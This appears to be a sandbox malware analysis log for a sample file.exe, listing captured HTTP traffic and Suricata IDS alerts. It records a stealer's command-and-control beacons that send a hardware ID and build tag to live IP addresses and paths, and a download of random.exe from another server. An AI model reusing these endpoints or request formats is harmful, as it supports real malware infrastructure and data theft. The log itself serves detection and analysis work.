Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 35 36 34 34 30 33 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1005644031&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /off/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 35 36 34 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1005645001&unit=246122658369
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 30 32 39 37 39 42 30 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B02979B05C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 30 32 39 37 39 42 30 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B02979B05C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----ECGIIIDAKJDHJKFHIEBFHost: 185.215.113.206Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 43 47 49 49 49 44 41 4b 4a 44 48 4a 4b 46 48 49 45 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 30 43 36 45 43 41 31 33 38 39 41 32 39 31 39 33 31 34 35 38 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 49 49 49 44 41 4b 4a 44 48 4a 4b 46 48 49 45 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 49 49 49 44 41 4b 4a 44 48 4a 4b 46 48 49 45 42 46 2d 2d 0d 0a Data Ascii: ------ECGIIIDAKJDHJKFHIEBFContent-Disposition: form-data; name="hwid"80C6ECA1389A291931458------ECGIIIDAKJDHJKFHIEBFContent-Disposition: form-data; name="build"mars------ECGIIIDAKJDHJKFHIEBF--
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 30 32 39 37 39 42 30 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B02979B05C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 30 32 39 37 39 42 30 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B02979B05C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FIDGHIIECGHDHJKFCAEGHost: 185.215.113.206Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 49 44 47 48 49 49 45 43 47 48 44 48 4a 4b 46 43 41 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 30 43 36 45 43 41 31 33 38 39 41 32 39 31 39 33 31 34 35 38 0d 0a 2d 2d 2d 2d 2d 2d 46 49 44 47 48 49 49 45 43 47 48 44 48 4a 4b 46 43 41 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 46 49 44 47 48 49 49 45 43 47 48 44 48 4a 4b 46 43 41 45 47 2d 2d 0d 0a Data Ascii: ------FIDGHIIECGHDHJKFCAEGContent-Disposition: form-data; name="hwid"80C6ECA1389A291931458------FIDGHIIECGHDHJKFCAEGContent-Disposition: form-data; name="build"mars------FIDGHIIECGHDHJKFCAEG--
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 30 32 39 37 39 42 30 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B02979B05C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DGHIDAFCGIEHIEBFCFBAHost: 185.215.113.206Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 47 48 49 44 41 46 43 47 49 45 48 49 45 42 46 43 46 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 30 43 36 45 43 41 31 33 38 39 41 32 39 31 39 33 31 34 35 38 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 49 44 41 46 43 47 49 45 48 49 45 42 46 43 46 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 49 44 41 46 43 47 49 45 48 49 45 42 46 43 46 42 41 2d 2d 0d 0a Data Ascii: ------DGHIDAFCGIEHIEBFCFBAContent-Disposition: form-data; name="hwid"80C6ECA1389A291931458------DGHIDAFCGIEHIEBFCFBAContent-Disposition: form-data; name="build"mars------DGHIDAFCGIEHIEBFCFBA--
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 30 32 39 37 39 42 30 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B02979B05C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AKKEGHJDHDAFHIDHCFHDHost: 185.215.113.206Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 4b 4b 45 47 48 4a 44 48 44 41 46 48 49 44 48 43 46 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 30 43 36 45 43 41 31 33 38 39 41 32 39 31 39 33 31 34 35 38 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4b 45 47 48 4a 44 48 44 41 46 48 49 44 48 43 46 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4b 45 47 48 4a 44 48 44 41 46 48 49 44 48 43 46 48 44 2d 2d 0d 0a Data Ascii: ------AKKEGHJDHDAFHIDHCFHDContent-Disposition: form-data; name="hwid"80C6ECA1389A291931458------AKKEGHJDHDAFHIDHCFHDContent-Disposition: form-data; name="build"mars------AKKEGHJDHDAFHIDHCFHD--

Source: Joe Sandbox View	IP Address: 185.215.113.43 185.215.113.43
Source: Joe Sandbox View	IP Address: 13.107.246.40 13.107.246.40
Source: Joe Sandbox View	IP Address: 13.107.246.40 13.107.246.40

Source: Joe Sandbox View	ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View	JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.5:49704 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.5:49758 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.5:49957 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:50236 -> 31.41.244.11:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50244 -> 172.67.174.133:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50247 -> 172.67.174.133:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:50245 -> 31.41.244.11:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50252 -> 172.67.174.133:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50256 -> 172.67.174.133:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50257 -> 172.67.174.133:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50260 -> 172.67.174.133:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:50263 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50264 -> 172.67.174.133:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50270 -> 23.210.122.61:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50278 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50273 -> 172.67.174.133:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:50276 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50282 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50285 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50286 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50290 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50292 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:50293 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50294 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50296 -> 23.197.127.21:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50297 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50301 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50303 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50304 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50306 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50309 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50313 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50311 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50316 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50324 -> 23.197.127.21:443
Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.109.210.53:443 -> 192.168.2.5:49732
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:50254 -> 192.64.117.218:443
Source: Network traffic	Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.5:50254 -> 192.64.117.218:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:50265 -> 176.9.192.202:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:50262 -> 176.9.192.202:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:50269 -> 176.9.192.202:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:50272 -> 176.9.192.202:443
Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.109.210.53:443 -> 192.168.2.5:50222

Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C73CC60 PR_Recv,

0_2_6C73CC60

Source: global traffic	HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
